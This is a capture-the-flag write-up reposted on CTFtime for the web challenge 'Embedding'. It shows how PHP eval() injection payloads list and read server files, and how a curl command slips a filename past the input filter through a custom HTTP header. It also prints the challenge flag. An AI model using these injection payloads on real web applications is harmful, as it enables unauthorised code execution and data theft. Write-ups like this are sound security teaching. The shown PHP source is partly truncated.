CTFtime.org

Embedding

by JohnKhW071 / ErrorSheet

Tags: web 

Rating: 4.0

# Web-Embedding
URL of the challenge: [http://138.91.58.10/Embedding/](Embedding)

In the page, we got a input box
```html
<input name="username" placeholder="Enter Your UserName Here">
```

We tried to input
> getcwd()

The result changed to
> /var/www/html/Embedding welcome

Thus, we knew that the challenge is about <font color="#f03c15"> Eval() Vulnerability </font>

Then, we put
> print_r(scandir(getcwd()))

to get all file in this directory.

The result changed to
> Array ( \[0\] => . \[1\] => .. \[2\] => [email protected] \[3\] => index.php ) 1 welcome

Finally, we knew that the flag is stored in [email protected]

Before we get the source code of [email protected], we should know the constants of the input first

Thus, we typed
> show_source(end(scandir(getcwd())))

```php
<html>
<head><title>Embedded Challenge </title> </head>
<body>
<form>
<input name="username" placeholder="Enter Your UserName Here"/>
<input type="Submit"/>
</form>
</body>
</html>

40) {
die("Bad Character Detected or you Break The Limit ");
}
$username=$_GET['username'];
$eval=eval("echo ".$username.";");
echo(" welcome ".$eval);
}
?>
```

Thus, we knew that the input only can be\
a-z, 0-9, (, ), _, ., ' and the string length must be smaller than 41

First we try that
> read_file(next(array_reverse(scandir('.'))))

However, the string length is 43, we cannot get the result.

Thus, we found that we can set the header of the request to store variable [email protected]

Then, we use curl command in console to get the source code of [email protected]

> curl -s -H "Flag: [email protected]" "http://138.91.58.10/Embedding/?username=show_source(end(getallheaders()))"

```html
<html>
<head><title>Embedded Challenge </title> </head>
<body>
<form>
<input name="username" placeholder="Enter Your UserName Here"/>
<input type="Submit"/>
</form>
</body>
</html>

<span>
<span><?php
$flag</span><span>=</span><span>"0xL4ugh{Z!90o_S@y_W3lC0m3}"</span><span>;
</span><span>?>
</span>
</span>
1 welcome
```

Finally, we got the flag ^.^

> 0xL4ugh{Z!90o_S@y_W3lC0m3}

Original writeup (https://github.com/JohnKHW/ctfwriteup/blob/master/0xL4ugh/Embedding.md).

Comments